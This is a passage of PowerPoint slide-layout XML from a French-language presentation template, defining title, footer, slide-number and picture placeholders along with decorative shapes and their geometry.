              <a:defRPr/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Groupe 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{318297D9-06C8-4470-8289-F79AACE55C24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B5EE13B-1044-48AD-A203-67FAF88875F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9" name="Rectangle 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85F36895-B504-46A9-86CC-78E65D7BF209}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Groupe 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFAC94D5-456C-4605-8E29-4A6817F29865}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2DDFFAB-8002-497E-96D5-A2EED31CE49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1" name="Rectangle 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6422827-D014-4129-B1F6-E5305EFC4169}"/>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89893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A">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Espace réservé pour une image  25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74BE2D75-3510-44E8-9490-544C83DEEB7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312516" y="335667"/>
            <a:ext cx="5783484" cy="5916433"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5783484"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 5916433"/>
              <a:gd name="connsiteX1" fmla="*/ 5783484 w 5783484"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 5916433"/>
              <a:gd name="connsiteX2" fmla="*/ 5783484 w 5783484"/>
              <a:gd name="connsiteY2" fmla="*/ 2275453 h 5916433"/>
              <a:gd name="connsiteX3" fmla="*/ 5783484 w 5783484"/>
              <a:gd name="connsiteY3" fmla="*/ 2627453 h 5916433"/>
              <a:gd name="connsiteX4" fmla="*/ 5783484 w 5783484"/>
              <a:gd name="connsiteY4" fmla="*/ 2627455 h 5916433"/>
              <a:gd name="connsiteX5" fmla="*/ 5783484 w 5783484"/>
              <a:gd name="connsiteY5" fmla="*/ 2689451 h 5916433"/>
              <a:gd name="connsiteX6" fmla="*/ 5783484 w 5783484"/>
              <a:gd name="connsiteY6" fmla="*/ 2763133 h 5916433"/>
              <a:gd name="connsiteX7" fmla="*/ 5781679 w 5783484"/>
              <a:gd name="connsiteY7" fmla="*/ 2763133 h 5916433"/>
              <a:gd name="connsiteX8" fmla="*/ 5779543 w 5783484"/>
              <a:gd name="connsiteY8" fmla="*/ 2850354 h 5916433"/>
              <a:gd name="connsiteX9" fmla="*/ 2722561 w 5783484"/>
              <a:gd name="connsiteY9" fmla="*/ 5912235 h 5916433"/>
              <a:gd name="connsiteX10" fmla="*/ 2708476 w 5783484"/>
              <a:gd name="connsiteY10" fmla="*/ 5912592 h 5916433"/>
              <a:gd name="connsiteX11" fmla="*/ 2708476 w 5783484"/>
              <a:gd name="connsiteY11" fmla="*/ 5916433 h 5916433"/>
              <a:gd name="connsiteX12" fmla="*/ 0 w 5783484"/>
              <a:gd name="connsiteY12" fmla="*/ 5916433 h 5916433"/>
              <a:gd name="connsiteX13" fmla="*/ 0 w 5783484"/>
              <a:gd name="connsiteY13" fmla="*/ 370390 h 5916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83484" h="5916433">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5783484" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5783484" y="2275453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5783484" y="2627453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5783484" y="2627455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5783484" y="2689451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5783484" y="2763133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5781679" y="2763133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5779543" y="2850354"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5698401" y="4502793"/>
                  <a:pt x="4374319" y="5828508"/>
                  <a:pt x="2722561" y="5912235"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2708476" y="5912592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2708476" y="5916433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5916433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="370390"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9E91B59-1C1C-47B7-A921-F13B66F53F23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6317270" y="3678507"/>
            <a:ext cx="5529032" cy="830997"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="2400" cap="all" baseline="0">
                <a:latin typeface="Gilroy ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>TITRE du chapitre </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>sur deux lignes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du pied de page 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DEE29E3-45E4-4154-9648-E51996A3B4DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Titre de la présentation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Espace réservé du texte 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FDFF556-322C-4C83-9372-4F866EFBCB4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8725118" y="1586480"/>
            <a:ext cx="713336" cy="1911292"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="13800" u="none">
                <a:ln w="76200">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gilroy ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du numéro de diapositive 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{674F5C38-2B91-4D70-B87F-62EE74C98013}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Image 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{747D9450-CEDB-4DA1-90C8-B2B7D4D59D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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Groupe 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80640137-A06D-41F6-A8DC-16B42EED8103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEA492A6-F744-4D1F-AF03-AD07CCC69F39}"/>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2" name="Rectangle 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5DA8F16-F81B-4BC9-A37D-02B0353C0D8E}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Groupe 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC08D2E7-CA3F-41B1-944A-A56938B0AADD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E8F3162-2250-4F46-9AFA-C296E7B25A6B}"/>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7" name="Rectangle 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB236439-6968-43B6-A71D-65B441FABDDA}"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348512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lines + Subtitle + Txt">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6" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B06170-AF06-4468-96E7-0D2036A367AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17"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8" name="Espace réservé du numéro de diapositive 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{804C5343-499B-4BF1-A833-E1D95D91F157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle : avec coin arrondi 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEACFE01-D4D4-4DB6-BC6D-CCD328BE55DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="370391" y="833377"/>
            <a:ext cx="11526418" cy="5347503"/>
          </a:xfrm>
          <a:prstGeom prst="round1Rect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3642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7" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8FA6B15-855F-4994-BE5E-A1EB4E1F532B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="558165"/>
            <a:ext cx="4924920" cy="757130"/>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la présentation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>sur deux lignes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>si necessaire</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Espace réservé du texte 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5756114-49B7-46AD-A56A-13CACAA4A794}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100138" y="2122488"/>
            <a:ext cx="9890125" cy="1384300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE56AEA4-E95E-4B53-A965-6C20A29E2813}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525011" y="1315295"/>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1" name="Groupe 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40A3753D-A7D9-4C36-9BCD-2AF0E726ACAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D67D04FE-9153-4083-ACFD-76F40A0C9D59}"/>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3" name="Rectangle 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5453C74E-74ED-43F0-9588-61FCEB8C9DFF}"/>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4" name="Groupe 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F792F211-1B37-449D-BAF5-9288986046A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="7045594" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Groupe 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA54C4AC-E405-4B98-A178-AB5371068808}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7045594" y="2588002"/>
              <a:ext cx="1885826" cy="1681996"/>
              <a:chOff x="2689543" y="1651754"/>
              <a:chExt cx="1885826" cy="1681996"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05D19100-ED4E-4765-B5E6-F3EAAC3E18FD}"/>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9" name="Rectangle 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43E87468-3422-4D55-AEDF-7E0670818133}"/>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26" name="Image 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E655D1BC-90C3-47F2-AD8F-7F93DF43574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27" name="Image 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4031B7D6-507A-4369-9F6E-4AC787F9AB8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56953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Subtitle + 2 columns Text">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p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Titre de la présentation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA4654A-2799-4696-8BD3-08CE9D537A32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972445" y="2119523"/>
            <a:ext cx="4329552" cy="2880789"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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2" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F184540-5E0B-4E79-B56A-393167A3F400}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6335606" y="2119523"/>
            <a:ext cx="4527594" cy="2686889"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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3" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D054F555-2807-4A27-BCDE-7BD849D1AB16}"/>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6" name="Espace réservé du numéro de diapositive 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B56E5A7D-A71C-46EC-B19B-39522010A5CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle : avec coin arrondi 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3E37B13-638A-419B-81FE-52C11D84194A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="370391" y="833377"/>
            <a:ext cx="11526418" cy="5347503"/>
          </a:xfrm>
          <a:prstGeom prst="round1Rect">
            <a:avLst>
              <a:gd name="adj" fmla="val 36421"/>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fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A220B50D-9CD9-4FA9-84AA-D94B0D1E9D44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525011" y="1003988"/>
            <a:ext cx="11049000"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sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Titre 6">
